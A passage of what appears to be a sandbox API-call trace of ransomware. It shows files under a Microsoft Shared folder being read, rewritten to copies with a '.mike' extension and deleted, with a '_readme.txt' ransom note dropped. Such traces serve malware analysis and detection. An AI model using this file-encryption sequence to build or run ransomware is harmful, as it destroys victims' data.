lpFilePart=0x0) returned 0x3d [0042.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.393] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.393] GetFileType (hFile=0x264) returned 0x1 [0042.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.393] GetFileType (hFile=0x264) returned 0x1 [0042.393] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.393] WriteFile (in: hFile=0x264, lpBuffer=0x2260fa4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2260fa4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.395] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), fInfoLevelId=0x0, lpFileInformation=0x2260af8 | out: lpFileInformation=0x2260af8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb)) returned 1 [0042.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0042.395] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.395] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.395] GetFileType (hFile=0x264) returned 0x1 [0042.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.395] GetFileType (hFile=0x264) returned 0x1 [0042.396] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0042.396] ReadFile (in: hFile=0x264, lpBuffer=0x22620b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22620b0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.398] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.398] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.398] GetFileType (hFile=0x264) returned 0x1 [0042.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.399] GetFileType (hFile=0x264) returned 0x1 [0042.399] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.400] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.400] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.400] GetFileType (hFile=0x264) returned 0x1 [0042.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.400] GetFileType (hFile=0x264) returned 0x1 [0042.400] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0042.400] ReadFile (in: hFile=0x264, lpBuffer=0x226f038, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x226f038*, lpNumberOfBytesRead=0x2af0c8*=0x12db, lpOverlapped=0x0) returned 1 [0042.401] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.401] GetFileType (hFile=0x264) returned 0x1 [0042.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.401] GetFileType (hFile=0x264) returned 0x1 [0042.401] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0042.401] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0042.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.401] GetFileType (hFile=0x264) returned 0x1 [0042.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0042.401] GetFileType (hFile=0x264) returned 0x1 [0042.402] WriteFile (in: hFile=0x264, lpBuffer=0x227b1ec*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x227b1ec*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0042.403] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.403] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.403] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37917e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe37917e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe37917e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3d00)) returned 1 [0042.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.403] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.403] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.417] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), fInfoLevelId=0x0, lpFileInformation=0x227c8ac | out: lpFileInformation=0x227c8ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37917e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe37917e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe37917e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3d00)) returned 1 [0042.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.417] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", dwFileAttributes=0x80) returned 1 [0042.417] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.417] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 1 [0042.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.418] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", lpFilePart=0x0) returned 0x42 [0042.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0042.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0042.419] GetFileType (hFile=0x264) returned 0x1 [0042.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0042.419] GetFileType (hFile=0x264) returned 0x1 [0042.419] WriteFile (in: hFile=0x264, lpBuffer=0x227e4cc*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x227e4cc*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0042.420] CloseHandle (hObject=0x264) returned 1 [0042.420] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpFilePart=0x0) returned 0x3d [0042.420] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.420] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.421] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.421] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.464] GetFileType (hFile=0x264) returned 0x1 [0042.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0042.465] GetFileType (hFile=0x264) returned 0x1 [0042.465] CloseHandle (hObject=0x264) returned 1 [0042.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.465] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.465] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.465] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), fInfoLevelId=0x0, lpFileInformation=0x22832a0 | out: lpFileInformation=0x22832a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425)) returned 1 [0042.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.465] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2283588 | out: lpFileInformation=0x2283588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425)) returned 1 [0042.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", lpFilePart=0x0) returned 0x42 [0042.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.466] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", lpFilePart=0x0) returned 0x42 [0042.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.466] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", lpFilePart=0x0) returned 0x42 [0042.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.467] GetFileType (hFile=0x264) returned 0x1 [0042.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.467] GetFileType (hFile=0x264) returned 0x1 [0042.467] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.467] WriteFile (in: hFile=0x264, lpBuffer=0x22842b4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22842b4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.468] CloseHandle (hObject=0x264) returned 1 [0042.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.468] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2283e08 | out: lpFileInformation=0x2283e08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425)) returned 1 [0042.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0042.468] 